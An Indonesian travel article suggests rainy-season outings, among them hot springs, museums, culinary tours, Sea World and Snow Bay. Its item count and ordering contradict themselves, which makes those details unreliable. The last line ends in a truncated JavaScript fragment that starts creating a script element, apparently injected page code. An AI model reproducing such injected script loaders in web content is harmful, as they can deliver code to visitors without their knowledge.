Tempat Wisata Yang Dapat Anda Kunjungi Saat Musim Hujan

Musim hujan telah tiba, lokasi liburan yang kebanyakan outdoor menjadi penghalang untuk jalan-jalan. Jangan sampai cuaca membatalkan rencana berlibur anda, apalagi di akhir pekan nanti. Nah, kali ini kami akan memberikan informasi Tempat Wisata Yang Dapat Anda Kunjungi Saat Musim Hujan.

Sebagai pejalan cerdas, sebelum merencanakan liburan, kondisi musim menjadi salah satu faktor penting yang patut diwaspadai. Sungguh tak lucu bila di musim hujan Anda justru berencana mendaki gunung atau menikmati hamparan savana di sekitaran Ubud. Anda hanya akan merasa kecewa terhadap hujan yang menghalangi perjalanan Anda!

 

hujan
Lalu pertanyaannya, apakah musim hujan harus menghalangi Anda berwisata ke tempat-tempat baru yang Anda inginkan? Jawabannya, tentu tidak. Para pecinta wisata cerdas bisa menikmati wisata di empat tempat ini ketika musim hujan.

Berikut adalah tempat wisata yang tetap bisa didatangi meski sedang musim hujan

1. Pemandian Air Panas

Pantai dan sungai jelas tak bersahabat di musim hujan karena sudah pasti ombak laut akan tinggi dan arus sungainya deras. Namun bukan berarti Anda tidak bisa menikmati kesegaran air di musim hujan, sebab Anda masih bisa memilih wisata lain seperti berendam di air panas. Berendam di kolam air panas ditemani rintik hujan dan hawa dingin akan membuat suasana liburan Anda terasa romantis.

2. Menikmati Hamparan Pegunungan dan Perkebunan Buah dan Sayur

Menyaksikan rintik hujan dari balik kaca jendela yang berhadapan secara langsung dengan bukit-bukit barisan hijau adalah momen yang teramat langka. Anda mungkin boleh memilih berkunjung ke salah satu penginapan di sekitar wisata. Jika hujannya turun di malam sebelumnya, maka Anda bisa menyempatkan diri mengitari sekitaran penginapan, menikmati kebun buah, sayur dan berbincang akrab dengan petani. Anda mungkin bisa membeli sayur dan buah dari petani, lalu dibawa dan dimasak di vila. Hujansambil makan sup itu akan terasa nikmat.

3. Jalan ke Museum

Musim hujan begitu enaknya jalan ke museum. Bisa menambah pengetahuan tetapi tetap kering dan hangat. Di museum Anda bisa memperluas pengetahuan tentang berbagai sejarah yang ada. Anda bisa berkemsempatan mengenal lebih dekat tentang beragam barang-barang antik hingga fosil mahluk hidup di zaman purba.

4. Wisata Kuliner

Wisata yang aman dari terjangan hujan deras dan cuaca dingin yang paling tepat adalah kulineran. Betapa nikmatnya saat melahap sop konro dan coto makassar agar badan terasa hangat di tengah cuaca dingin. Selain berkesempatan menikmati beragam menu makanan, pengetahuan Anda soal beragam jenis makanan barang tentu semakin bertambah.

5. Sea World
Pilihan tempat pertama yang bisa Anda datangi untuk berlibur di musim hujan adalah Sea World. Sea World adalah taman biota laut yang terdapat di Taman Impian Jaya Ancol. Tempatnya yang indoor menjadikan Sea World tepat sebagai pilihan berlibur ketika musim hujan. Anda akan terbebas dari air hujan. Di sini, pengunjung bisa melihat aneka satwa laut yang cantik sambil berenang di dalam akuarium raksasa. Tidak hanya itu, Anda juga bisa memasuki lorong sambil melihat ikan berenang di atas kepala Anda. Dijamin, siapa saja yang melewati lorong ini akan merasa seolah-olah sedang berjalan di bawah laut.

6. Snow Bay
Jakarta memang tidak kehabisan akal dalam mempersiapkan tempat wisata asyik ketika musim hujan tiba. Kali ini Anda bisa datang ke Snow Bay yang lagi-lagi berada di kawasan Taman Mini Indonesia Indah. Snow Bay adalah arena permainan air yang selalu ramai dikunjungi baik saat musim panas maupun musim hujan tiba. Arena permainan air memang selalu bisa di datangi kapan saja, karena setiap pengunjung yang datang sudah pasti basah dan akan membilas tubuhnya saat akan pulang. Jadi, tidak masalah jika dikunjungi saat hujan tiba.

@evoucher.co.idvar d=document;var s=d.createElement(‘script’);